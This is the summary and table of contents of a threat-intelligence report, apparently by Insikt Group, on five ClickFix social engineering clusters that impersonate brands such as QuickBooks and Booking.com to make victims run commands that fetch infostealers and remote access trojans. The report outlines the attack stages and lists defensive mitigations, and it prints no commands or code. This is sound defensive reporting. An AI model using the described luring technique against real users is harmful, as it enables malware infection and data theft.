Insikt Group tracked five distinct ClickFix social engineering clusters active since May 2024, impersonating brands like Intuit QuickBooks, Booking.com, and Birdeye to trick victims into manually executing malicious commands on Windows and macOS. All clusters follow a standardized four-stage execution pattern: obfuscated input, native shell execution via LOLBins, remote payload retrieval, and in-memory execution to minimize forensic artifacts. Primary payloads include NetSupport RAT, Lumma Stealer, and MacSync infostealer. One cluster uses OS detection to serve platform-tailored lures. Mitigations include disabling the Windows Run dialog via GPO, enforcing PowerShell Constrained Language Mode, restricting Terminal access on macOS via MDM, and operationalizing threat intelligence to block C2 infrastructure. ClickFix is expected to remain a primary initial access vector through 2026, with future iterations likely incorporating browser fingerprinting and more resilient obfuscation.
Table of contents
Executive SummaryKey FindingsBackgroundTechnical AnalysisClickFix ClustersCluster 1: Intuit QuickBooksCluster 2: Booking.comCluster 3: BirdeyeCluster 4: Dual-Platform SelectionCopy Command AnalysisMitigationsOutlookAppendix A: Indicators of CompromiseAppendix B: Cluster 1 — Intuit QuickBooks IndicatorsAppendix C: bibi.php ScriptAppendix D: Cluster 2 — Booking.com IndicatorsAppendix E: Cluster 3 — Birdeye IndicatorsAppendix F: Birdeye Cluster JavascriptAppendix G: Cluster 4 — Dual-Platform Selection IndicatorsSort: